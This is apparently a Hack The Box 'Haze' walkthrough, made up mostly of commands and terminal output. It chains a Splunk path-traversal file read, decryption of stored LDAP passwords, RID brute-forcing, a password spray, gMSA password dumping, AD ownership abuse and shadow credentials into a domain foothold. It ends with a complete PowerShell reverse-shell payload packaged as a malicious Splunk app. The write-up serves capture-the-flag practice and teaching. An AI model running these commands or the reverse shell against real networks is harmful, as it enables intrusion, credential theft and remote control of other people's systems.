Start by reading the server.conf file to extract the pass4SymmKey (peer-to-peer auth key) and SSL certificate password:
1
| curl -k "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/server.conf"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| ┌──(kali㉿kali)-[~/HTB/Haze]
└─$ curl -k "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/server.conf"
[general]
serverName = dc01
pass4SymmKey = $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==
[sslConfig]
sslPassword = $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==
[lmpool:auto_generated_pool_download-trial]
description = auto_generated_pool_download-trial
peers = *
quota = MAX
stack_id = download-trial
[lmpool:auto_generated_pool_forwarder]
description = auto_generated_pool_forwarder
peers = *
quota = MAX
stack_id = forwarder
[lmpool:auto_generated_pool_free]
description = auto_generated_pool_free
peers = *
quota = MAX
stack_id = free
|
The server.conf reveals the Splunk pass4SymmKey (used for peer-to-peer authentication) and the SSL certificate password — both encrypted with Splunk’s built-in secret key.
Next, read the authentication.conf file to extract LDAP bind credentials:
1
| curl -s "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/authentication.conf"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| ──(kali㉿kali)-[~/HTB/Haze]
└─$ curl -s "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/authentication.conf"
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
|
The authentication.conf reveals the LDAP bind credentials:
- User:
CN=Paul Taylor,CN=Users,DC=haze,DC=htb - Password: Encrypted hash (
$7$...)
Splunk uses a hierarchical key system to encrypt sensitive configuration values. To decrypt the password, we need the splunk.secret key file — a machine-specific key that acts as the master decryption key:
1
| curl -s "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/auth/splunk.secret"
|
1
2
3
4
5
| ┌──(kali㉿kali)-[~/HTB/Haze]
└─$ curl -s "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/auth/splunk.secret"
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
┌──(kali㉿kali)-[~/HTB/Haze]
└─$ echo "NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD" > splunk_secret
|
1
| splunksecrets splunk-decrypt -S splunk_secret
|
1
| paul.taylor:Ld@p_Auth_Sp1unk@2k24
|
Splunk Password Encryption – Splunk uses a hierarchical key system to encrypt sensitive configuration values. The splunk.secret is a machine-specific key file; using splunksecrets with this key allows decryption of password hashes stored in authentication.conf and other config files.
Credentials obtained: paul.taylor:Ld@p_Auth_Sp1unk@2k24
Initial Access
User Enumeration via RID Brute-Force
RID (Relative Identifier) brute-force enumerates domain users by cycling through well-known RIDs appended to the domain SID:
1
| nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
|
1
| nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser"
|
1
| nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
|
1
2
3
4
5
6
7
8
9
10
11
| ┌──(kali㉿kali)-[~/HTB/Haze]
└─$ cat users.txt
Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
|
RID Brute-Force works by querying an SMB server with a known domain SID and cycling through relative identifiers (RIDs). Each valid RID reveals the associated user or group name, enabling user enumeration without requiring domain admin privileges.
Password Spray Attack
A password spray tests a single password against many users to avoid account lockouts:
1
| crackmapexec winrm 10.10.11.61 -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb
|
Found: mark.adams reuses the same password (Ld@p_Auth_Sp1unk@2k24).
1
| evil-winrm -i haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24'
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| ┌──(kali㉿kali)-[~/HTB/Haze]
└─$ evil-winrm -i haze.htb -u mark.adams -p Ld@p_Auth_Sp1unk@2k24
*Evil-WinRM* PS C:\Users\mark.adams\Documents> whoami ; ipconfig ; hostname
haze\mark.adams
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.61
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
dc01
*Evil-WinRM* PS C:\Users\mark.adams\Documents>
|
Now we have a WinRM session as mark.adams.
Group Managed Service Accounts (gMSA) Enumeration
gMSA (Group Managed Service Account) – A special AD account type for services that provides automatic password management and SPN management. Passwords are rotated automatically by the Domain Controller, and retrieval is controlled via the PrincipalsAllowedToRetrieveManagedPassword attribute.
mark.adams is a member of gMSA_Managers, granting write access to gMSA accounts:
Enumerate the gMSA_Managers group to confirm mark.adams is a member:
1
2
3
4
5
6
7
8
9
10
| Get-ADGroup -Identity "gMSA_Managers" -Properties *
DistinguishedName : CN=gMSA_Managers,CN=Users,DC=haze,DC=htb
GroupCategory : Security
GroupScope : Global
groupType : -2147483646
Name : gMSA_Managers
ObjectGUID : 6d45d53a-fc2a-433c-aefa-298b5989f997
objectSid : S-1-5-21-323145914-28650650-2368316563-1107
Members : {CN=Mark Adams,CN=Users,DC=haze,DC=htb}
|
1
2
3
4
5
| Get-ADServiceAccount -Filter * | Select Name,SamAccountName
Name SamAccountName
---- --------------
Haze-IT-Backup Haze-IT-Backup$
|
1
2
3
4
5
6
7
8
9
10
11
12
| Get-ADServiceAccount -Identity "Haze-IT-Backup" -Properties *
CN : Haze-IT-Backup
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
DNSHostName : Haze-IT-Backup.haze.htb
Enabled : True
Name : Haze-IT-Backup
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
objectSid : S-1-5-21-323145914-28650650-2368316563-1111
SamAccountName : Haze-IT-Backup$
sAMAccountType : 805306369
PrincipalsAllowedToRetrieveManagedPassword : {CN=Domain Admins,CN=Users,DC=haze,DC=htb}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
| Get-Acl "AD:CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb" | Format-List
Path : Microsoft.ActiveDirectory.Management.dll\ActiveDirectory:://RootDSE/CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Owner : HAZE\Domain Admins
Group : HAZE\Domain Admins
Access : Everyone Deny
HAZE\paul.taylor Deny
HAZE\paul.taylor Deny
HAZE\paul.taylor Deny
HAZE\paul.taylor Deny
NT AUTHORITY\Authenticated Users Allow
NT AUTHORITY\SYSTEM Allow
BUILTIN\Account Operators Allow
HAZE\Domain Admins Allow
HAZE\gMSA_Managers Allow
Everyone Allow
NT AUTHORITY\SELF Allow
NT AUTHORITY\SELF Allow
NT AUTHORITY\SELF Allow
BUILTIN\Windows Authorization Access Group Allow
HAZE\Cert Publishers Allow
HAZE\gMSA_Managers Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
HAZE\Key Admins Allow
HAZE\Enterprise Key Admins Allow
CREATOR OWNER Allow
NT AUTHORITY\SELF Allow
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Allow
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Allow
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Allow
NT AUTHORITY\SELF Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
NT AUTHORITY\SELF Allow
NT AUTHORITY\SELF Allow
HAZE\Enterprise Admins Allow
BUILTIN\Pre-Windows 2000 Compatible Access Allow
BUILTIN\Administrators Allow
Audit :
Sddl : O:DAG:DAD:AI(OD;;CR;00299570-246d-11d0-a768-00aa006e0529;;WD)(OD;CI;RP;0e78295a-c6d3-0a40-b491-d62251ffa0a6;;S-1-5-21-323145914-28650650-2368316563-1103)(OD;CI;RP;e362ed86-b728-0842-b27d-2dea7a9df218;;S-1-5-21-323145914-28650650-2368316563-
1103)(OD;CI;RP;f8758ef7-ac76-8843-a2ee-a26b4dcaf409;;S-1-5-21-323145914-28650650-2368316563-1103)(OD;CI;RP;d0d62131-2d4a-d04f-99d9-1c63646229a4;;S-1-5-21-323145914-28650650-2368316563-1103)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;
SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AO)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)(A;;LCRPRC;;;S-1-5-21-323145914-28650650-2368316563-1107)(OA;;RP;e362ed86-b728-0842-b27d-2dea7a9df218;;WD)(OA;;RPWP;77b5b886-944a-11d1-aebd-0000f80367c1;;PS)(OA;;SW;
f3a64788-5306-11d1-a9c5-0000f80367c1;;PS)(OA;;SW;72e39547-7b18-11d1-adef-00c04fd8d5cd;;PS)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;RPWP;bf967a7f-0de6-11d0-a285-00aa003049e2;;CA)(OA;;WP;888eedd6-ce04-df40-b462-b8a50e41
ba38;;S-1-5-21-323145914-28650650-2368316563-1107)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO
ID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-4
5bc-9b07-ad6f015e5f28;RU)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIOID;RP;59ba2f42-79a2-11d0-
9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)
(OA;CIID;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-323145914-28650650-2368316563-526)(OA;CIID;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-323145914-28650650-2368316563-527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba
;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIOID;RP;b7c
69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-
00aa003049e2;PS)(OA;CIIOID;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIOID;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIOID;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;OICIID;RPWP;3f78c3e5-f79a-46bd-a0b8-9
d18116ddc79;;PS)(OA;CIID;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;CIID;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-323145914-28650650-2368316563-519)(A;CIID;LC;;;RU)(A;CIID;CCLCSWRPWPLOCRSDRCWDWO;;;BA)
|
Exploitation
gMSADumper
Reads any gMSA password blobs the user can access and parses the values.
1
| python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
|
1
2
3
4
| ┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> Domain Admins
|
Since mark.adams is not in the PrincipalsAllowedToRetrieveManagedPassword list, we need to add him first using the WinRM session:
1
| Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ evil-winrm -i haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
*Evil-WinRM* PS C:\Users\mark.adams\Documents>
|
With the ACL updated, re-run gMSADumper to extract the gMSA password hash:
1
| python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
|
1
2
3
4
5
6
7
| ┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> mark.adams
Haze-IT-Backup$:::a70df6599d5eab1502b38f9c1c3fd828
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:a455156dcce482f3ac359929b41d2f5ead1d72dd764b7f5d9f27a8c2a44a67a6
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:d99b9f57ffe1a4ab867a018a99a7edab
|
WriteOwner Abuse
BloodHound analysis reveals that Haze-IT-Backup$ has WriteOwner privileges over the SUPPORT_SERVICES group. This means we can take ownership of the group, then grant ourselves GenericAll, and finally add our account as a member.
To sync time with the time of machine use this command
1
| sudo ntpdate 10.10.11.61
|
Creating a Ticket for HAZE-IT-BACKUP$
1
| getTGT.py haze.htb/Haze-IT-Backup\$ -hashes ':a70df6599d5eab1502b38f9c1c3fd828'
|
1
2
3
4
5
6
| ┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ python3 /home/kali/HTB/getTGT.py haze.htb/Haze-IT-Backup\$ -hashes ':a70df6599d5eab1502b38f9c1c3fd828'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Haze-IT-Backup$.ccache
|
This command uses bloodyAD to change the owner of the “SUPPORT_SERVICES” AD object to Haze-IT-Backup$, authenticated via Kerberos, on the dc01.haze.htb Domain Controller in the haze.htb domain.
First export ticket
1
| export KRB5CCNAME=Haze-IT-Backup\$.ccache
|
1
2
| bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k \
set owner "SUPPORT_SERVICES" 'Haze-IT-Backup$'
|
1
2
3
4
| ┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k \
set owner "SUPPORT_SERVICES" 'Haze-IT-Backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES
|
This command grants Haze-IT-Backup$ the GenericAll privilege (full control) over the SUPPORT_SERVICES user object in Active Directory on dc01.haze.htb, using Kerberos authentication.
1
2
| bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k \
add genericAll "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" 'Haze-IT-Backup$'
|
1
2
3
4
5
| ┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k \
add genericAll "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ has now GenericAll on CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb
|
This command adds Haze-IT-Backup$ as a member of the SUPPORT_SERVICES group in Active Directory on dc01.haze.htb, using Kerberos authentication.
1
2
| bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k \
add groupMember "SUPPORT_SERVICES" 'Haze-IT-Backup$'
|
1
2
3
4
| ┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k \
add groupMember "SUPPORT_SERVICES" 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ added to SUPPORT_SERVICES
|
Re-run BloodHound collection to enumerate the new privileges:
1
2
3
| KRB5CCNAME=Haze-IT-Backup\$.ccache
bloodhound-python -u 'Haze-IT-Backup$' -d 'haze.htb' -ns $IP --zip -c All -dc 'dc01.haze.htb' -k -no-pass
|
Shadow Credentials Attack
The Shadow Credentials attack exploits the msDS-KeyCredentialLink attribute in Active Directory to add a rogue public key to a privileged target account. This allows the attacker to generate a private key and authenticate as the target user via PKINIT (Kerberos certificate-based authentication), bypassing passwords entirely.
Since we have GenericAll over SUPPORT_SERVICES (and edward.martin is a member), we can add Shadow Credentials to edward.martin:
1
2
3
| bloodyAD --host "dc01.haze.htb" -d "haze.htb" \
-u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' \
add shadowCredentials "edward.martin"
|
The bloodyAD command generates a PEM certificate and private key. Bundle them into a PKCS#12 (.pfx) file using OpenSSL (leave the export password empty):
1
| openssl pkcs12 -export -out DD92ubbL.pfx -inkey DD92ubbL_priv.pem -in DD92ubbL_cert.pem
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| ┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" \
-u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' \
add shadowCredentials "edward.martin"
[+] KeyCredential generated with following sha256 of RSA key: 2ca10ebd73c3cbdd82513aa2a2776ebbfc00688c9aabe49d266c26673cd2906b
No outfile path was provided. The certificate(s) will be stored with the filename: 8lnjKdh7
[+] Saved PEM certificate at path: 8lnjKdh7_cert.pem
[+] Saved PEM private key at path: 8lnjKdh7_priv.pem
A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Run the following command to obtain a TGT:
python3 PKINITtools/gettgtpkinit.py -cert-pem 8lnjKdh7_cert.pem -key-pem 8lnjKdh7_priv.pem haze.htb/edward.martin 8lnjKdh7.ccache
┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ ls
8lnjKdh7_cert.pem 8lnjKdh7_priv.pem
┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ openssl pkcs12 -export -out DD92ubbL.pfx -inkey 8lnjKdh7_priv.pem -in 8lnjKdh7_cert.pem
Enter Export Password:
Verifying - Enter Export Password:
|
Use certipy with the PFX certificate to authenticate via PKINIT and retrieve the NT hash for edward.martin:
1
| certipy-ad auth -pfx DD92ubbL.pfx -u 'edward.martin' -domain haze.htb -dc-ip 10.10.11.61 -debug
|
1
2
3
4
5
6
7
8
9
10
11
12
| ┌──(kali㉿kali)-[~/HTB/Haze/gMSADumper]
└─$ certipy-ad auth -pfx DD92ubbL.pfx -u 'edward.martin' -domain haze.htb -dc-ip 10.10.11.61 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: edward.martin@haze.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'edward.martin.ccache'
[*] Trying to retrieve NT hash for 'edward.martin'
[*] Got hash for 'edward.martin@haze.htb': aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af
|
With the NT hash, connect via Evil-WinRM as edward.martin and retrieve the user flag:
1
| evil-winrm -i haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
|
1
| type ..\Desktop\user.txt
|
Privilege Escalation
Local enumeration reveals a Splunk backup ZIP file in C:\Backups\Splunk:
1
| download C:/Backups/Splunk/splunk_backup_2024-08-06.zip
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| ┌──(kali㉿kali)-[~/HTB/Haze/reverse_shell_splunk]
└─$ evil-winrm -i haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\edward.martin\Documents> cd ..
*Evil-WinRM* PS C:\Users\edward.martin> cd ..
*Evil-WinRM* PS C:\Users> cd ..
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/5/2025 12:32 AM Backups
d----- 3/25/2025 2:06 PM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 3/4/2025 11:28 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d----- 4/4/2025 8:18 AM Temp
d-r--- 4/4/2025 6:07 AM Users
d----- 3/25/2025 2:15 PM Windows
*Evil-WinRM* PS C:\> cd C:\Backups\Splunk
*Evil-WinRM* PS C:\Backups\Splunk> download splunk_backup_2024-08-06.zip
|
Extract the splunk.secret key file from the backup, which will be used to decrypt credentials:
1
| cat etc/auth/splunk.secret
|
1
2
3
| ┌──(kali㉿kali)-[~/HTB/Haze/Splunk]
└─$ cat etc/auth/splunk.secret
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B
|
The backup also contains a snapshot of authentication.conf with an older $1$-encrypted password for alexander.green:
1
| cat var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| ┌──(kali㉿kali)-[~/HTB/Haze/Splunk]
└─$ cat var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
[default]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_Admins,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
|
The authentication snapshot contains an encrypted $1$-prefixed password for alexander.green. Older Splunk versions used $1$ encryption (vs $7$ for newer). The splunk-legacy-decrypt subcommand handles this format:
Save the secret to a file, then decrypt using splunksecrets:
1
| echo "CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B" > splunk.secret
|
1
| splunksecrets splunk-legacy-decrypt -S splunk.secret
|
1
2
3
4
5
6
7
8
9
| ┌──(kali㉿kali)-[~/HTB/Haze/splunksecrets]
└─$ python3 -m venv venv
source venv/bin/activate
┌──(venv)─(kali㉿kali)-[~/HTB/Haze/splunksecrets]
└─$ splunksecrets splunk-legacy-decrypt -S splunk.secret
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24
|
Decrypted: alexander.green:Sp1unkadmin@2k24
With alexander.green’s credentials, we can log into the Splunk web interface. Splunk allows administrators to upload custom app packages (.spl files) that execute with the Splunk service’s privileges. Since Splunk runs as SYSTEM, this gives us a high-privilege shell.
Use the reverse_shell_splunk technique to craft a malicious app:
First, edit run.ps1 inside the package to point to your listener:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| $client = New-Object System.Net.Sockets.TCPClient('10.10.xx.xxx', 2004)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % { 0 }
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
$sendback = (iex $data 2>&1 | Out-String)
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte, 0, $sendbyte.Length)
$stream.Flush()
}
$client.Close()
